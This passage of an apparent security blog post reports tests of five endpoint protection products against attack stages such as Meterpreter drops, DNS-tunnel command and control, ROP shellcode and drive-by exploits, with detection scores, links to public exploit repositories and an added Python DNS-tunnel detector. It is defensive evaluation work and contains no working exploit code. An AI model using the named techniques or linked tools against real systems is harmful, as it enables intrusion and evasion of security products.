<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 204.9pt;" valign="top" width="342"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Blocked on any stage of attack (earlier better)<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 6;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 252.5pt;" valign="bottom" width="421"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">DELIVERY/INSTALL: Encoded Meterpreter x64 as an EXE drop<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 204.9pt;" valign="top" width="342"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Detected and cleaned on delivery stage or blocked on execution<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 7;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 252.5pt;" valign="bottom" width="421"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">DELIVERY/INSTALL: Encoded Meterpreter x64 as a DLL drop<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 204.9pt;" valign="top" width="342"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Detected and cleaned on delivery stage or blocked on execution<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 8;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 252.5pt;" valign="bottom" width="421"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">DELIVERY/INSTALL: Hash based malware<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 204.9pt;" valign="top" width="342"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Detected and cleaned on delivery stage or blocked on execution<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 9; mso-yfti-lastrow: yes;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 252.5pt;" valign="bottom" width="421"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">DELIVERY/INSTALL: Not Hash based malware<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 204.9pt;" valign="top" width="342"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Detected and cleaned on delivery stage or blocked on execution<o:p></o:p></span></div>
</td>
</tr>
</tbody></table>
<div class="11BodyText">
<br /></div>
<div class="11BodyText">
<br /></div>
<h4 style="margin-left: 1.25in; text-align: left;">
<span style="font-weight: normal; mso-bidi-font-family: "Nokia Sans"; mso-fareast-font-family: "Nokia Sans";">1.1.4<span style="font-size: 7pt; font-stretch: normal; font-variant-numeric: normal; line-height: normal;">
</span></span><!--[endif]-->Command & Control</h4>
<div class="11BodyText">
The custom VBS backdoor used a stealthy reverse DNS
tunnel (via nslookup) as its main communication method. The same method was used by the DbD
exploits to download the backdoor (via svchost). A normal TCP connection was used as the
communication method for Meterpreter. <o:p></o:p><br />
<br /></div>
<table border="0" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="border-collapse: collapse; margin-left: 59.0pt; mso-padding-alt: 0in 5.4pt 0in 5.4pt; mso-yfti-tbllook: 1184; width: 633px;">
<tbody>
<tr style="height: 15.0pt; mso-yfti-firstrow: yes; mso-yfti-irow: 0;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border: solid #161616 1.0pt; height: 15.0pt; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 190.0pt;" valign="bottom" width="317"><div align="center" class="MsoNormal" style="text-align: center;">
<b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;">TEST CASE</span></b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;"><o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: solid #161616 1.0pt; height: 15.0pt; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 190.0pt;" valign="top" width="317"><div align="center" class="MsoNormal" style="text-align: center;">
<b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPECTED BEHAVIOR</span></b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;"><o:p></o:p></span></div>
</td>
</tr>
<tr style="height: 15.0pt; mso-yfti-irow: 1;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: 15.0pt; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-top-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 190.0pt;" valign="bottom" width="317"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">C&C: Meterpreter TCP<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: 15.0pt; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-top-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 190.0pt;" valign="top" width="317"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Detected or blocked<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: 15.0pt; mso-yfti-irow: 2; mso-yfti-lastrow: yes;">
<td nowrap="" style="border-top: none; border: solid #161616 1.0pt; height: 15.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 190.0pt;" valign="bottom" width="317"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">C&C: Reverse DNS via svchost<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #161616 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: 15.0pt; mso-border-left-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 190.0pt;" valign="top" width="317"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Detected <o:p></o:p></span></div>
</td>
</tr>
</tbody></table>
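<div class="11BodyText">
The DNS-tunnel C&C case above is visible in resolver-side query logs regardless of which endpoint process sent the lookups. The following is an added example, not code from the original post: the log tuple format, the thresholds, the function names and the <code>c2-demo.test</code> zone are assumptions, and the sample log is constructed.</div>

```python
import hashlib
import math
from collections import Counter, defaultdict


def shannon_entropy(text):
    """Bits per character; encoded payloads score higher than hostnames."""
    if not text:
        return 0.0
    total = len(text)
    return -sum(n / total * math.log2(n / total) for n in Counter(text).values())


def split_qname(qname, depth=2):
    """Split a query name into (subdomain, parent zone).

    Taking the last `depth` labels as the zone is a simplification;
    production code should use the Public Suffix List instead.
    """
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[:-depth]), ".".join(labels[-depth:])


def detect_dns_tunnels(records, window=300, min_unique=20, min_len=24, min_entropy=3.0):
    """Flag (client, zone) pairs that send many unique, long, high-entropy
    subdomains to a single zone inside one time window."""
    buckets = defaultdict(set)
    for ts, client, qname, _qtype in records:
        sub, zone = split_qname(qname)
        if sub:
            buckets[(client, zone, ts // window)].add(sub)

    alerts = []
    for (client, zone, bucket), subs in sorted(buckets.items()):
        payloads = [s.replace(".", "") for s in subs]
        mean_len = sum(map(len, payloads)) / len(payloads)
        mean_entropy = sum(map(shannon_entropy, payloads)) / len(payloads)
        # A unique-name count alone also matches CDNs and asset hosts, so the
        # length and entropy conditions must hold as well.
        if len(subs) >= min_unique and mean_len >= min_len and mean_entropy >= min_entropy:
            alerts.append({
                "client": client,
                "zone": zone,
                "window_start": bucket * window,
                "unique_subdomains": len(subs),
                "mean_length": mean_len,
                "mean_entropy": round(mean_entropy, 2),
            })
    return alerts


def build_sample_log():
    """Constructed resolver log: (epoch_seconds, client_ip, qname, qtype)."""
    log = []
    for i in range(30):
        # Tunnel-like traffic: every query carries a fresh 40-character hex label.
        label = hashlib.sha256(str(i).encode()).hexdigest()[:40]
        log.append((1000 + 2 * i, "10.0.0.23", f"{label}.c2-demo.test", "A"))
        # Benign look-alike: many unique but short, readable names.
        log.append((1000 + 5 * i, "10.0.0.5", f"img{i}.static.example.net", "A"))
    for i in range(40):
        # Ordinary browsing: a few names repeated many times.
        host = ("www", "mail", "api")[i % 3]
        log.append((1000 + 3 * i, "10.0.0.5", f"{host}.example.com", "A"))
    return log


if __name__ == "__main__":
    for alert in detect_dns_tunnels(build_sample_log()):
        print(alert)
```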
<div class="MsoNormal">
<br /></div>
<h3 style="margin-left: 0.5in; text-align: left; text-indent: -0.25in;">
2.<span style="font-size: 7pt; font-stretch: normal; font-variant-numeric: normal; font-weight: normal; line-height: normal;">
</span><!--[endif]-->Test files</h3>
<div>
<div class="separator" style="clear: both; text-align: center;">
</div>
Sorry, I can't share the samples, but I can share some of the sources from which I took some of them:</div>
<div>
<br /></div>
<div>
<a href="https://github.com/Cr4sh/fwexpl" style="text-indent: -0.25in;">https://github.com/Cr4sh/fwexpl</a> (ring3 -> ring0 -> SMM )<br />
<a href="https://github.com/eik00d/Reverse_DNS_Shellcode">https://github.com/eik00d/Reverse_DNS_Shellcode</a> (Reverse DNS shellcode, VBS PoC and C&C)<br />
<a href="https://www.reverse.it/">https://www.reverse.it</a> (sometimes you can find good samples here)</div>
<div class="11BodyText" style="margin-left: 172.9pt;">
<br /></div>
<h3 style="margin-left: 0.5in; text-align: left; text-indent: -0.25in;">
3.<span style="font-size: 7pt; font-stretch: normal; font-variant-numeric: normal; font-weight: normal; line-height: normal;">
</span><!--[endif]-->Results for 5 different products</h3>
<table border="0" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="border-collapse: collapse; margin-left: 17.75pt; mso-padding-alt: 0in 5.4pt 0in 5.4pt; mso-yfti-tbllook: 1184; width: 795px;">
<tbody>
<tr style="height: .2in; mso-yfti-firstrow: yes; mso-yfti-irow: 0;">
<td nowrap="" style="border: solid windowtext 1.0pt; height: .2in; mso-border-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;">TEST CASE\Solution<o:p></o:p></span></b></div>
</td>
<td nowrap="" style="border-left: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;">5 products<o:p></o:p></span></b></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 1;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">DELIVERY: HTML with exploits<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">0/5<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 2;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">DELIVERY: WORD with macros<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">0/5<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 3;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITATION: ROP Shellcode<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">2/5 (StackPivot detection by hooks on
VirtualAlloc/VirtualProtect), 1 of them bypassed, because the hooks were in ring3,
as in https://asintsov.blogspot.de/2016/12/bypassing-exploit-protection-of-norton.html<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 4;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITATION: Shellcode<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">5/5 (detection by hooks on various
calls), 2 of them bypassed, because the hooks were in ring3, as was done
in https://asintsov.blogspot.de/2016/12/bypassing-exploit-protection-of-norton.html<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .3in; mso-yfti-irow: 5;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .3in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITATION: 1day ring0 exploit<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .3in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">0/5<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 6;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITATION: HeapSpray <o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">1/5, by pre-allocation of well-known addresses; could be bypassed<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 7;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITATION: Exploit triggers - UAF, BoF<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">0/5<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 8;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITATION/INSTALL: DbD with VBS - BoF<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">4/5 (</span><span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITATION: ROP Shellcode + EXPLOITATION:
Shellcode + INSTALL: VBS backdoor run)<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 9;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITATION/INSTALL: DbD with VBS - UAF<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">5/5 (</span><span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITATION: ROP Shellcode + EXPLOITATION:
Shellcode + INSTALL: VBS backdoor run)<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 10;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITATION/INSTALL: DbD with met64 - BoF<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">3/5 (</span><span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITATION: ROP Shellcode + EXPLOITATION:
Shellcode + DELIVERY/INSTALL: Encoded Meterpreter x64 as a drop EXE)<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 11;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITATION/INSTALL: DbD with met64 - UAF<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">3/5 (</span><span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITATION: ROP Shellcode + EXPLOITATION:
Shellcode + DELIVERY/INSTALL: Encoded Meterpreter x64 as a drop EXE)<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 12;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOIT: 0day Macros run<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">2/5<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 13;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOIT: Meterpreter x86
(in mem)<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">1/5<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: 17.4pt; mso-yfti-irow: 14;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: 17.4pt; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">INSTALL: VBS backdoor run<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: 17.4pt; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">1/5<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 15;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">DELIVERY/INSTALL: Encoded Meterpreter x64 as a drop EXE<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">2/5 (AWESOME RESULTS)<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 16;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">DELIVERY/INSTALL: Encoded Meterpreter x64 as a drop DLL<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">3/5<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 17;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">DELIVERY/INSTALL: Hash based malware<o:p></o:p></span></div>
</td>
